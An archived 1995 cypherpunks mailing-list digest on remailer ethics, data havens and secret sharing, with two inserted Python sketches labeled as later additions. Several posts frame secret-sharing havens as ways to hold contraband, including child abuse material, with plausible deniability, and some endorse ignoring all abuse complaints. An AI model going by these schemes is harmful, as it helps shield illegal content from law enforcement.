It's always been a good policy to use a foreign mailer in a chain
where anonymity is critically important.  That doesn't mean it's OK
to make Homer the whipping boy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 17 Jan 95 12:33:02 PST
To: cypherpunks@toad.com
Subject: Internet News: NNBC News Story moved to tonight (Tuesday) (fwd)
Message-ID: <Pine.SOL.3.90.950117152737.366A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 17 Jan 1995 14:23:11 -0500
From: Craig Peterson <craig@Mainstream.com>
To: Multiple recipients of list <rkba-alert@gatekeeper.nra.org>
Subject: INFO: NBC Nightly News Story moved to tonight (Tuesday)

A story regarding the Internet, with some sort of mention of NRA.org,
should be on the NBC Nightly News with Tom Brokaw tonight.

Craig.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 17 Jan 95 12:35:13 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <Pine.HPP.3.91.950117105356.16699A-100000@cor.sos.sll.se>
Message-ID: <9501172032.AA29703@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 17 Jan 1995 11:06:16 +0100 (MET)
    From: Mats Bergstrom <asgaard@sos.sll.se>

    This thread illustrates (at least if setups like this are
    worthy of a place in Raph's list) that penet.fi is the safest
    way to go for the moment.

That depends on your threat model.  For most, chaining is safer than
penet.

    I would just hate it to have my head on the plate of a remailer
    operator who takes an interest in subtle ethical discussion of
    whether to sell me out or not.

Your characterization of what Homer has said strikes me as extremely
inaccurate.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 17 Jan 95 12:39:06 PST
To: Johnathan Corgan <jcorgan@scruznet.com>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Chameleon.4.01.950116182254.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <Pine.SUN.3.91.950117153148.11572A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Jan 1995, Johnathan Corgan wrote:

> Date: Mon, 16 Jan 95 18:14:26 PST
> From: Johnathan Corgan <jcorgan@scruznet.com>
> To: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>,
>     Black Unicorn <unicorn@access.digex.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Another problem w/Data Havens... 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Data havens that can split data to two or more locations in separate 
> >jurisdictions can effectively ignore attention from authorities not 
> >related to the site management or site performance.  Encryption mandated 
> >sites can also take this stance, while encryption is legal in any event.
> 
> It just occurred to me when reading this another method for ensuring the
> "I can't tell what's in it" condition with a data haven operator.  Why not
> use a secret sharing system where the contraband data is split into a number
> of pieces and sent to different havens?  It could be argued that the individual
> pieces are not the same as the whole, and there is absolutely no way the
> operator could recover the original from a given piece (thus providing
> plausible deniability.)
> 
> Using M by N secret sharing, with M < N, you build in some redundancy in case
> one of the havens gets shutdown.

This was essentially my point, phrased much more precisely.

I believe this has been suggested, even discussed at length before on the 
list.

Just from a structure standpoint, the haven could segment the data, 
use some sort of encryption, and then send an encrypted message 
containing the "resegmenting key."

Theoretically the haven would destroy the resegmenting key after 
generating it and sending it, leaving the original sender with the only 
copy.

Trust in the data haven operator is bolstered by his or her interest in 
not knowing the contents of the data, or the retrieval key for the data, 
lest he or she be vulnerable to authority scrutiny.

> ==
> Johnathan Corgan       "Violence is the last refuge of the incompetent."
> jcorgan@scruznet.com                    -Isaac Asimov

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 17 Jan 95 12:49:59 PST
To: wcs@anchor.ho.att.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <9501170829.AA10034@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.950117154344.11572B-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995 wcs@anchor.ho.att.com wrote:

> Date: Tue, 17 Jan 95 03:29:17 EST
> From: wcs@anchor.ho.att.com
> To: grendel@netaxs.com
> Cc: cypherpunks@toad.com
> Subject: Re: Another problem w/Data Havens...
> 
> 
> Liability is a legal issue, not a technical one.
> (Catchability is a technical issue.)

BING!

> 
> Alice asks Dave's Data Haven to store stuff, and later retrieves it.
> Dave doesn't want to be able to know what's in it.
> There are three main threat periods - at receipt of the data,
> during storage, and at retrieval.  Secret sharing is great for
> the storage period, assuming the data havens are in different
> jurisdictions and the cops can't force the operator (Dave)
> to go retrieve all the pieces.  
> 
> However, at receipt of the data, it's all in one place, Dave's inbox.
> If Alice encrypted it safely, or secret-shared it herself, great!
> But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime,
> or Alice's key has been compromised, anything in Dave's inbox is
> still toast, even if anything that's been split and stored is safer
> than if it had been stored unsplit.  So he either needs to split it fast,
> shortening the window, or find a way to blind his mail before processing it,
> or split it before reading it.

I found this very insightful.  All the more reason to mandate encryption, 
or to encrypt all plaintext on arrival.

> 
> Splitting before reading isn't impossible in a stream environment.
> Define a protocol that looks like SMTP, but opens up three outgoing 
> streams as well as an incoming stream, and uses standard mail formats.
> While reading the headers from Alice (either the real contents or just the
> handshakes at the beginning), Dave's receiver thinks about them
> and sends some meaningful headers to Moe, Larry, and Curly.
> Once the message body starts, instead of storing the incoming bytes,
> Dave sends every other byte to Moe or Larry, and the xors to Curly.*
> If he wants to get fancy, he can even encrypt the data with a stream
> cypher as he goes along, giving half the key to each of them.
> That way, Dave's system really only has knowledge of the headers,
> plus one line at a time of incriminating data on the fly.
> And his partners can't give anything away either; they're just stooges.
> 
> * If the connections to and storage by Moe and Larry are reliable enough,
> Curly doesn't really need to be involved, but the xor business lets
> you reconstruct everything from just two parts.

I like the pure elegance of this solution.
Are there implemented DH codes running around anywhere?

> 
> 
> 			Bill
> 			
> "Privacy is not a crime!"			
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
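The split-before-reading receiver quoted above, as an added Python sketch that is not code from any poster in this thread: byte pairs go to Moe and Larry, their XOR goes to Curly, and any two stores rebuild the message. The class and function names and the length trailer are assumptions of this sketch; note that Moe and Larry each still hold half the plaintext bytes, so the scheme limits possession, not confidentiality, unless the stream-cipher variant from the post is layered on top.

```python
"""Split-on-receipt: every other byte to Moe or Larry, the XOR of each pair to Curly."""
from typing import Optional


class Stooge:
    """Hypothetical stand-in for one outgoing connection and the store behind it."""

    def __init__(self, name: str) -> None:
        self.name = name
        self.data = bytearray()
        self.total_len: Optional[int] = None  # trailer sent when the stream ends

    def send(self, byte: int) -> None:
        self.data.append(byte)


class StreamSplitter:
    """Dave's receiver: forwards bytes as they arrive and holds at most one."""

    def __init__(self, moe: Stooge, larry: Stooge, curly: Stooge) -> None:
        self.moe, self.larry, self.curly = moe, larry, curly
        self._pending: Optional[int] = None  # first byte of the current pair
        self._count = 0

    def feed(self, chunk: bytes) -> None:
        for byte in chunk:
            self._count += 1
            if self._pending is None:
                self.moe.send(byte)           # even offsets go to Moe
                self._pending = byte          # kept only until its partner arrives
            else:
                self.larry.send(byte)         # odd offsets go to Larry
                self.curly.send(self._pending ^ byte)
                self._pending = None

    def finish(self) -> None:
        if self._pending is not None:
            # Odd-length body: the last byte has no partner, so XOR it with zero.
            self.curly.send(self._pending)
            self._pending = None
        for stooge in (self.moe, self.larry, self.curly):
            stooge.total_len = self._count


def split_message(message: bytes, chunk_size: int = 7):
    """Feed a message through the splitter in network-sized chunks."""
    moe, larry, curly = Stooge("moe"), Stooge("larry"), Stooge("curly")
    splitter = StreamSplitter(moe, larry, curly)
    for start in range(0, len(message), chunk_size):
        splitter.feed(message[start:start + chunk_size])
    splitter.finish()
    return moe, larry, curly


def reconstruct(moe: Optional[Stooge] = None, larry: Optional[Stooge] = None,
                curly: Optional[Stooge] = None) -> bytes:
    """Rebuild the original body from any two of the three stores."""
    have = [s for s in (moe, larry, curly) if s is not None]
    if len(have) < 2:
        raise ValueError("need at least two of the three parts")
    total = have[0].total_len
    if total is None or any(s.total_len != total for s in have):
        raise ValueError("parts do not belong to the same message")
    pairs = total // 2
    if moe is not None:
        evens = bytes(moe.data)
    else:
        # a = b XOR (a XOR b); a trailing unpaired byte sits in Curly as-is.
        evens = bytes(l ^ c for l, c in zip(larry.data, curly.data))
        evens += bytes(curly.data[pairs:])
    if larry is not None:
        odds = bytes(larry.data)
    else:
        # b = a XOR (a XOR b) for each complete pair.
        odds = bytes(m ^ c for m, c in zip(moe.data[:pairs], curly.data[:pairs]))
    out = bytearray(total)
    out[0::2] = evens
    out[1::2] = odds
    return bytes(out)


if __name__ == "__main__":
    body = b"constructed sample message body"  # constructed input, not real mail
    m, l, c = split_message(body)
    print(reconstruct(moe=m, curly=c) == body, reconstruct(larry=l, curly=c) == body)
```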





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Gone Fission)
Date: Tue, 17 Jan 95 13:14:09 PST
To: cypherpunks@toad.com
Subject: Re: Abuse and Remailer Ethics
Message-ID: <199501172119.QAA09578@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.950116205019.7181A-100000@math>,
Homer Wilson Smith <homer@math.cornell.edu> wrote:
>     I am not presently on cypherpunks, so please include me in the
>replies.

It's a little (not a lot) rude to start a substantive conversation and not
to listen in to the list for duration.  Just my O.

>     Does a list owner have the right to demand blocking to his list,
>with or without a vote of the list readers?  I would say yes.

And the power.  They can filter them out at the level of the mailing address.
Tell 'em to do their own work.  Put it gently and politely, but if they're
the list admin, they can easily filter out mail from specific addresses
without bugging a busy remailer operator who is, after all, doing a service
to the net much as the list admin is.  "Scenario them rosily with a
calculated ambiguity which they will be sure to understand."
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxv4hRNhgovrPB7dAQFBbwP/XCzg7Zyib0ZXPDPpv/0QKR+jKYCchJ+r
bcIfM4g+rP1uxyuBj1ErLhvc18Dpu/zjp5u2ZR5F9L6OYEF6YrYrUhgq1hsTNc1U
lHZsCNr8ZuOpfU/dLAeLvrZLNak39eVmoMnInSNO0q7dUoMnaKz8CjZAQvy+TK4A
eqle4P9fmSM=
=4z27
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxw0MioZzwIn1bdtAQGx2AF/WUf23vWGlV6WXUfQ2BBYuEodnnUvN5GM
hYLbdgZ7BO6NWpgbLSPQYCs2X4yWMqVW
=m+km
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: habs@cmyk.warwick.com (Harry S. Hawk)
Date: Tue, 17 Jan 95 13:22:51 PST
To: cypherpunks@toad.com (Good Guys)
Subject: A Reason for Privacy
Message-ID: <9501180022.AA08869@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I had a talk today with our Office Manager which reveals another
reason why we need an anon. system.

That is to say a good reason we can hold up to the press, media and
other people..

The Example:

Job Ads..

These are often done on an anon. basis. For example, the New York Times
will function as an anon. forwarder of job resumes...

The office manager needs to have both the company name and the name of
the person getting the resumes to be kept anonymous...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 17 Jan 95 13:52:20 PST
To: cypherpunks@toad.com
Subject: Netscape & future developments
Message-ID: <v01510101ab41a89797eb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




>
>Date: Tue, 17 Jan 1995 10:42:50 -0800
>From: wbarr@leland.stanford.edu (William P. Barr)
>To: apple-internet-providers@medraut.apple.com
>Subject: Netscape & future developments
>Message-ID: <v01510101ab41b9ba4234@[36.8.0.140]>
>
>Hello All,
>
>I just attended a talk given by Marc Andreessen, co-founder of Netscape,
>and he had several interesting things to say that you all might be
>interested in.
>
>First off, Netscape plans to make the API to its browser available to 3rd
>party developers in the near future.  With a list of over 1300 things users
>want added to the browser, he believes that other developers will be much
>more effective at filling the demand.  Could this move spawn the "Visual
>Basic" of the internet?  Perhaps ...
>
>Second, Netscape has formed some key partnerships.  Most notably, DEC and
>Sun will be redistributing Netscape server software through its channels.
>It has also created an alliance with Bank Of America and Mastercard for
>secured cash transactions.  Netscape is also providing all the servers for
>MCI's www services.
>
>Third, he said that by the end of this year, secured transactions will no
>longer be rare.  Currently the model of a transaction is:
>
>        Customer ---> Merchant ---> Card Issuer
>
>The new model will  be:
>
>        Customer ---> Card Issuer ---> Merchant
>
>This new model requires that you only have to trust your card issuer and
>the communications link from your machine to theirs.  The Card Issuer will
>then verify the credit and notify the merchant of the validity of the
>purchase.  There are two major ramifications:  First, you no longer have to
>worry about the integrity of the merchant; second, this will allow card
>issuers to change the rules for giving merchant status to businesses.  Marc
>predicted that by the end of the year, getting merchant status from several
>major card issuing banks will be greatly simplified, allowing dozens of
>businesses/services to spring up on the net, almost overnight.
>
>Finally, he said that the company is in the process of settling on a
>distributor to get the browser into the retail store-fronts.
>
>If you have any more questions, just ask.
>
>Bill
>
>*********************************************
>*William P. Barr                                        (415) 723-6632 (work)*
>*Multimedia Coordinator                          (415) 725-7398 (fax)   *
>*Stanford Computer Forum
>*
>*ERL 448/450                            wbarr@cs.stanford.edu (business)*
>*Stanford, CA, 94305-4055    wbarr@leland.stanford.edu (leisure)*
>*USA                                      "My opinion is mine and only mine*
>*********************************************
>

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 17 Jan 95 16:57:01 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: Does encrypted equal safe?
In-Reply-To: <9501172355.AA12246@eri.erinet.com>
Message-ID: <Pine.SUN.3.91.950117165334.18688B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

> ...
> Which is exactly why the encrypt on receipt or decrypt on delivery ideas 
> won't work.  You have to be provably ignorant of the data.

In my law school they taught that the burden of proof in a 
criminal case was on the government.

 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Tue, 17 Jan 95 16:05:30 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <v02110104ab420ae6be90@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:43 PM 1/17/95, Paul J. Ste. Marie wrote:
>At 03:29 AM 1/17/95 EST, bill.stewart@pleasantonca.ncr.com +1-510-484-6204
>wrote:
>> ... That way, Dave's system really only has knowledge of the headers,
>>plus one line at a time of incriminating data on the fly. ...
>
>I don't see exactly what that is buying Dave.  The entire contents were
>still transmitted to him, so the ability to see the entire file was still
>present, which means he could have, had he chosen to do so, prevented the
>file from residing on his system, and could have screened it.  It's
>essentially only the word of the haven op that shows he didn't examine the
>entire file.

That's the main reason why I like my idea of having a trusted encryptor.
Nobody's suggested that the current timestamp operators would be in Deep
Doo-Doo if they timestamped some piece of thoughtcrime; why should
somebody who encrypts be any different?

The service could even be advertised as a different form of timestamping
(or notarizing). Not only do you get the file back signed, but you get it
back encrypted and signed.

>    --Paul J. Ste. Marie
>      pstemari@well.sf.ca.us, pstemari@erinet.com

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 17 Jan 95 15:42:33 PST
To: wcs@anchor.ho.att.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <9501170829.AA10034@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.950117183343.17037A-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995 wcs@anchor.ho.att.com wrote:

> The former case is easy,
> if you can rent computer space in a country with a non-meddling
> government and good net access (or an easily rentable government :-).)
> For those of us in the latter situation, the discussion's still
> useful...

	Point taken.

> However, at receipt of the data, it's all in one place, Dave's inbox.
> If Alice encrypted it safely, or secret-shared it herself, great!
> But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime,
> or Alice's key has been compromised, anything in Dave's inbox is
> still toast, even if anything that's been split and stored is safer
> than if it had been stored unsplit.  So he either needs to split it fast,
> shortening the window, or find a way to blind his mail before processing it,
> or split it before reading it.

	I could write a procmail recipe and a script in about an hour to
automatically secret-share-split and redistribute the incoming submission.
If the authorities attempt to indict you for possessing illegal
information / kiddie porn / whatnot, they have to prove that you
interfered with the automatic redistribution process and examined the
contents of the submission. If you in fact did not look at the submission,
they would have a difficult time doing so. 

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 17 Jan 95 15:54:19 PST
To: Remailer-Operators@c2.org>
Subject: Re: Abuse and Remailer Ethics
Message-ID: <9501172343.AB11989@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 PM 1/16/95 -0500, Jonathan Rochkind wrote:
> ... So I'm tempted to say "tough luck" to newsgroups that
>don't like receiving anonymous posts. The alternative is for people
>interested to create a moderated newsgroup, where of course the moderator
>could refuse to allow anonymous posts with or without the remailer
>operators cooperation. ...

Another, and less onerous alternative, is to simply stick encrypted reply-to 
blocks on messages to newsgroups.  At that point there's no real difference 
between the anon post and a post from a system that doesn't provide real 
name<->userid mappings, and the flames can go straight from the newsgroup to 
the instigator without involving the remailer op.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 17 Jan 95 16:04:13 PST
To: cypherpunks@toad.com
Subject: Re: Does encrypted equal safe?
Message-ID: <9501172355.AA12246@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:28 PM 1/17/95 -0800, Eric Hughes wrote:
> ... Meaning is subjective.  If I see encrypted text, am I to be held
>responsible for having seen through an encryption for which I hold not
>the key?  Merely because someone knows a transformation into a
>disapproved form does not mean that I do. ...

Which is exactly why the encrypt on receipt or decrypt on delivery ideas 
won't work.  You have to be provably ignorant of the data.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Tue, 17 Jan 95 18:21:28 PST
To: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Subject: Re: Another problem w/Data Havens...
Message-ID: <v0211010bab42294fde97@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:03 PM 1/17/95, Robert Rothenberg wrote:
>> Doo-Doo if they timestamped some piece of thoughtcrime; why should
>> somebody who encrypts be any different?
>>
>> The service could even be advertised as a different form of timestamping
>> (or notarizing). Not only do you get the file back signed, but you get it
>> back encrypted and signed.
>
>Hmmm.... Of course in some cases one may not want the file to be returned
>with a signature and timestamp (might be incriminating evidence, depending
>on what one wants stored and the overall political situation where one is,
>etc....).  Of course that does sound useful.

Just as a notary public does not certify that a given document is truth,
but rather that it is what it is and the signature belongs to the person
who it appears to belong to, a public timestamp/notary/encryption service
on the 'net would certify the existence of that document in that form at
that time. No more, no less.

If I recall correctly, a notary can certify a sealed envelope without
knowing its contents, by putting a tamper-proof seal on it. Sound familiar?
I'll try to find a notary to see if that's the case. If so, we've got as
good a precedent as we'll ever find for just about anything.

>Rob <rrothenb@ic.sunysb.edu> Finger for public key

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Tue, 17 Jan 95 19:43:06 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rUB8U-0006GgC@hackvan.com>
Message-ID: <m0rURHN-0006GgC@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes wrote:
> 
> I'll tell you one really useful facility for offsite storage, and
> that's private key backup.  Use a secret sharing arrangement, say 5
> out of 7 reconstruction, and send out 7 chunks.  Now, give a different
> pointer-to-chunk to each of 7 different people.  In the case of
> catastrophe, you can recover your key.
> 

I'll second Eric on the utility of this practice.  I should've done this...
I lost a new pgp key when my hard disk hit the fan last month.  I can't even
revoke it...  

    Stig

FYI:  The key to ignore is 0x31F61BA9.  The new key is on a server near you.

    	  Key for user ID: Stig <stig@hackvan.com>
	  1024-bit key, Key ID 6202A715, created 1995/01/03
          Key fingerprint =  58 0C 16 D5 CD 27 EE 37  BB EC 47 73 36 12 9B 96 
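The 5-out-of-7 key backup described above, as an added Python example that is not code from the thread: Shamir secret sharing over a prime field, splitting a short secret (here assumed to be a 32-byte key that in turn protects the secret-key file) into 7 chunks of which any 5 recover it. The function names, the field prime and the one-byte length marker are choices made for this sketch.

```python
"""k-of-n secret sharing (Shamir) for backing up a short key-protecting secret."""
import secrets
from itertools import combinations

PRIME = 2**521 - 1          # Mersenne prime; the field must be larger than the secret
MAX_SECRET_BYTES = 64       # 1 marker byte + 64 secret bytes stay below PRIME


def _eval_poly(coeffs, x):
    """Horner evaluation of the sharing polynomial at x, modulo PRIME."""
    acc = 0
    for coeff in reversed(coeffs):
        acc = (acc * x + coeff) % PRIME
    return acc


def split_secret(secret: bytes, k: int, n: int):
    """Return n shares (x, y); any k of them determine the secret."""
    if not 1 < k <= n:
        raise ValueError("need 1 < k <= n")
    if len(secret) > MAX_SECRET_BYTES:
        raise ValueError("secret too long for this field")
    # A leading 0x01 marker preserves leading zero bytes of the secret.
    constant = int.from_bytes(b"\x01" + secret, "big")
    # Random degree k-1 polynomial whose constant term is the secret.
    coeffs = [constant] + [secrets.randbelow(PRIME) for _ in range(k - 1)]
    return [(x, _eval_poly(coeffs, x)) for x in range(1, n + 1)]


def recover_secret(shares, k: int) -> bytes:
    """Lagrange-interpolate the polynomial at x = 0 from k distinct shares."""
    points = dict(shares)                      # drops duplicate x values
    if len(points) < k:
        raise ValueError("not enough distinct shares")
    pts = list(points.items())[:k]
    total = 0
    for i, (xi, yi) in enumerate(pts):
        num, den = 1, 1
        for j, (xj, _) in enumerate(pts):
            if i != j:
                num = (num * -xj) % PRIME
                den = (den * (xi - xj)) % PRIME
        total = (total + yi * num * pow(den, -1, PRIME)) % PRIME
    raw = total.to_bytes(66, "big").lstrip(b"\x00")
    if not raw or raw[0] != 1:
        raise ValueError("shares are inconsistent or corrupted")
    return raw[1:]


def demo():
    """Split a constructed 32-byte key 5-of-7 and recover it from every 5-subset."""
    key = bytes(range(32))                     # constructed sample, not a real key
    shares = split_secret(key, k=5, n=7)
    return all(recover_secret(list(subset), 5) == key
               for subset in combinations(shares, 5))


if __name__ == "__main__":
    print("every 5-of-7 subset recovers the key:", demo())
```

Each share is as long as the field element, so the seven holders learn nothing about the secret from fewer than five chunks; losing up to two chunks is survivable.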




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rseymour@reed.edu (Robert Seymour)
Date: Tue, 17 Jan 95 19:49:47 PST
To: rishab@dxm.ernet.in
Subject: Re: Known data havens for pirates? Doubtful
In-Reply-To: <gate.ms64yc1w165w@dxm.ernet.in>
Message-ID: <m0rURMu-0000wyC@shiva.reed.edu>
MIME-Version: 1.0
Content-Type: text/plain


In the world according to rishab@dxm.ernet.in:
> I forget who wrote:
> > blame them. Copyrighted data on a server in a jurisdiction that
> > doesn't acknowledge the copyrights - a prime use for Data Havens
> > when they come of age.

> I suppose you _are_ aware that the US has threatened China with punitive
> duties on $100 BILLION dollars worth of trade, and that China has started
> holding some show trials (without shutting down its state-owned CD-piracy
> factories). It's not going to be easy to find a country more willing and
> able to ignore international copyright law (Berne Convention etc) than China;
> however, despite howls of protest even China is likely to knuckle down 
> eventually. What may be likely is distributed piracy markets, such as 
> described in Tim's BlackNet spoof.

One of the major features of the Uruguay round of the GATT (General
Agreement on Tariffs and Trade) is a large revision of international patent
and copyright law (which is currently de facto non-existent in many 
countries).  Intellectual copyrights are still somewhat vague in the
current agreement, but there will be a course for hearing through the
WTO (World Trade Organization).

In the case of Asian countries, APEC (Asian Pacific Economic Conference)
is laying out intellectual property right regulations for conference 
members (the US, Canada, and most of the Pacific Rim including China).
Though these agreements are still a long way from clearing up copyright
disputes and their enforcement remains dubious, they should help to 
stop such blatant infractions of copyright status.

Of course, one need not look to China for copyright violations, just take
a look at all the video tape pirates in New York or other cities ...

|Robert

-- 
Robert Seymour					rseymour@reed.edu
Reed College Artificial Life Project		NeXTmail, MIME, PGP accepted

  WWW Pages  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Tue, 17 Jan 95 17:03:52 PST
To: Ben.Goren@asu.edu
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <v02110104ab420ae6be90@[129.219.97.131]>
Message-ID: <9501180103.AA16543@toad.com>
MIME-Version: 1.0
Content-Type: text



Ben.Goren@asu.edu wrote:

> Doo-Doo if they timestamped some piece of thoughtcrime; why should
> somebody who encrypts be any different?
> 
> The service could even be advertised as a different form of timestamping
> (or notarizing). Not only do you get the file back signed, but you get it
> back encrypted and signed.
> 

Hmmm.... Of course in some cases one may not want the file to be returned
with a signature and timestamp (might be incriminating evidence, depending
on what one wants stored and the overall political situation where one is,
etc....).  Of course that does sound useful.

> 
> --
> Ben.Goren@asu.edu, Arizona State University School of Music
>  Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.
> 

Rob <rrothenb@ic.sunysb.edu> Finger for public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 17 Jan 95 11:13:11 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <199501171405.AA17997@xs1.xs4all.nl>
Message-ID: <Pine.HPP.3.91.950117193541.25204A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Name withheld on request wrote:

> wonders to what end remailers are being put by people who are worried
> about being "sold out".

The fundamental principle here is that an e-mail message is just so
many bits of 1's and 0's. It can never, in its own capacity, steal,
molest or kill. It is therefore not unethical to run a no-log 'fortress
remailer' and auto-delete ALL complaints, without exception. It might
not be feasible to do so if one wants to stay out of jail, but hopefully
this will change with the rapid increase in country domains
and the soon-to-come digicash market. Discussions of programming to
make fortress remailers work and to make them easily exportable to
African Linux-boxes are interesting. So are discussions of expected
repercussions on society. Ethical discussions of what is abuse or not
are better left to the clergy.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 17 Jan 95 11:50:55 PST
To: cypherpunks@toad.com
Subject: remailer security
In-Reply-To: <ab41c1b306021004669b@[132.162.201.201]>
Message-ID: <Pine.HPP.3.91.950117202620.25204C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


> If you chain it through 3 or 4 remailers with PGP, then pretty much all 3
> or 4 of them have got to decide to sell you out. I trust Julf a lot, but
> I'm not sure I trust him four times as much as every other remailer
> operator. Or something like that.

I am familiar with this argument and agree. In the discussed case
the alleged abuser had only used one remailer (on a site that keeps
logs world readable at that!). Laziness, I guess. There are ways of
multiple chaining for the lazy, though: C2 lets you pick the chained
sites by clicking on a web-page (but does it encrypt??).

Mats 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Tue, 17 Jan 95 18:25:10 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <9501172343.AB11989@eri.erinet.com>
